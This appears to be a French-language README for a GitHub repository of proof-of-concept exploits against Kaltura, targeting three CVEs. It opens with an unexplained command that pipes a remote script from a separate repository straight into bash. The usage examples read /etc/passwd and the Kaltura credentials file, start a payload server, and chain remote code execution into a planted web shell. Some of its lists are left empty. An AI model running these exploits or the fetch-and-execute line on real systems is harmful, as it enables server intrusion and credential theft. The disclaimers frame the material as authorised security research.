
Preuves de concept pour CVE-2026-19912, CVE-2026-19913 et CVE-2026-19914, démontrant la lecture de fichiers et l'exécution de code à distance dans Kaltura, destinées aux tests de sécurité autorisés et à des fins pédagogiques.
Exécutez la dernière version du script de téléchargement externe directement depuis GitHub :
bash <(curl -fsSL https://raw.githubusercontent.com/HORKimhab/collection-scripts/main/get-svn.sh)
Cette commande nécessite Bash et
curl. Examinez le script distant avant de l'exécuter si vous ne faites pas confiance à la source.
Utilisez ce projet uniquement dans des environnements sûrs et autorisés, tels que :
Exemple de configuration :
git clone <repository-url>
cd <repository-name>
# Le projet utilise Python, suivez les étapes ci-dessous
# Créez un environnement virtuel
python -m venv venv
# Activez l'environnement virtuel
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Installez les dépendances
pip install -r requirements.txt
Exemple d'utilisation :
# 1. Lecture de fichier (la plus fiable, fonctionne comme décrit dans l'article)
python3 kaltura_poc.py fileread http://127.0.0.1 -f /etc/passwd
python3 kaltura_poc.py fileread http://127.0.0.1 \
-f /opt/kaltura/app/configurations/local.ini --try-versions
# 2. Serveur de payload uniquement (à utiliser avec Burp / curl manuellement)
python3 kaltura_poc.py serve --lport 8888
# 3. Squelette de chaîne complète
python3 kaltura_poc.py rce http://127.0.0.1 \
--lhost 172.17.0.1 --lport 8888 \
--payload stdclass \
--shell '../../../../../../../../var/www/html/shell.php'
Un référentiel pour apprendre, tester et rechercher des concepts de cybersécurité dans des environnements contrôlés.
Ce référentiel est destiné uniquement à la recherche en sécurité pédagogique et autorisée.
Il est conçu pour aider les utilisateurs à apprendre :
Utilisez ce référentiel uniquement dans des environnements où vous avez l'autorisation, tels que :
Toute utilisation non autorisée ou illégale est strictement interdite.
L'auteur et les contributeurs ne sont pas responsables des dommages, mauvaises utilisations, problèmes juridiques ou pertes causés par ce projet.
En utilisant ce référentiel, vous acceptez que :
Ce projet est destiné à :
Veuillez suivre les pratiques de divulgation responsable et vous conformer à toutes les lois applicables.
Pour une divulgation responsable ou une collaboration, contactez le mainteneur du référentiel via GitHub.
Explorez la Collection de PoC CVE pour des ressources supplémentaires de preuves de concept CVE destinées à la recherche en sécurité autorisée et à l'éducation.